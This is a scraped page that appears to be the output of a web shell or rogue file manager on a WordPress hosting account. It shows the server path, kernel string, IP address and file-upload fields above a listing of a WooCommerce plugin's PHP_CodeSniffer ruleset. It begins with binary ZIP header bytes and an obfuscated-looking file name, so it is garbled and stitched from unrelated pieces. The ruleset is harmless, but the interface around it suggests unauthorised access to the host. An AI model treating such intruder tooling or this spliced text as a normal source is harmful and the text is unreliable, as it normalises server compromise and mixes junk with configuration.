PK œqhYî¶J‚ßFßF)nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/ $#$#$#

Dir : /home/trave494/tiktechtok.org/wp-content/plugins/woocommerce-store-toolkit/
Server: Linux ngx353.inmotionhosting.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
IP: 209.182.202.254
Choose File :

Url:
Dir : /home/trave494/tiktechtok.org/wp-content/plugins/woocommerce-store-toolkit/phpcs.xml

<?xml version="1.0"?>
<ruleset xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" name="WordPress Core" xsi:noNamespaceSchemaLocation="https://raw.githubusercontent.com/squizlabs/PHP_CodeSniffer/master/phpcs.xsd">

  <description>Non-controversial generally-agreed upon WordPress Coding Standards</description>

  <!--
  Included via WordPress-Extra.
  <rule ref="WordPress-Core"/>
  -->
  <rule ref="WordPress-Docs"/>
  <rule ref="WordPress-Extra">
    <!-- Prevent duplicate messages + deprecation notice from deprecated sniff. -->
    <exclude name="WordPress.WP.TimezoneChange.timezone_change_date_default_timezone_set"/>
    <exclude name="WordPress.WP.TimezoneChange.DeprecatedSniff"/>

    <exclude name="Generic.WhiteSpace.ScopeIndent"/>
    <exclude name="Generic.WhiteSpace.DisallowSpaceIndent"/>
    <exclude name="WordPress.NamingConventions.ValidVariableName"/>
    <exclude name="PSR2.Classes.PropertyDeclaration"/>
    <exclude name="WordPress.Files.FileName"/>
    <exclude name="PSR2.Methods.MethodDeclaration"/>

    <exclude name="Squiz.Commenting.FileComment"/>
    <exclude name="Squiz.Commenting.ClassComment.TagNotAllowed"/>
  </rule>

  <!-- Custom capabilities from WooCommerce. --> 
  <rule ref="WordPress.WP.Capabilities">
    <properties>
      <property name="custom_capabilities" type="array" value="manage_woocommerce,shop_manager" />
    </properties>
  </rule>
  <!-- Tests that the file name and the name of the class contained within the file match. -->
  <!-- <rule ref="Squiz.Classes.ClassFileName"/> -->

</ruleset>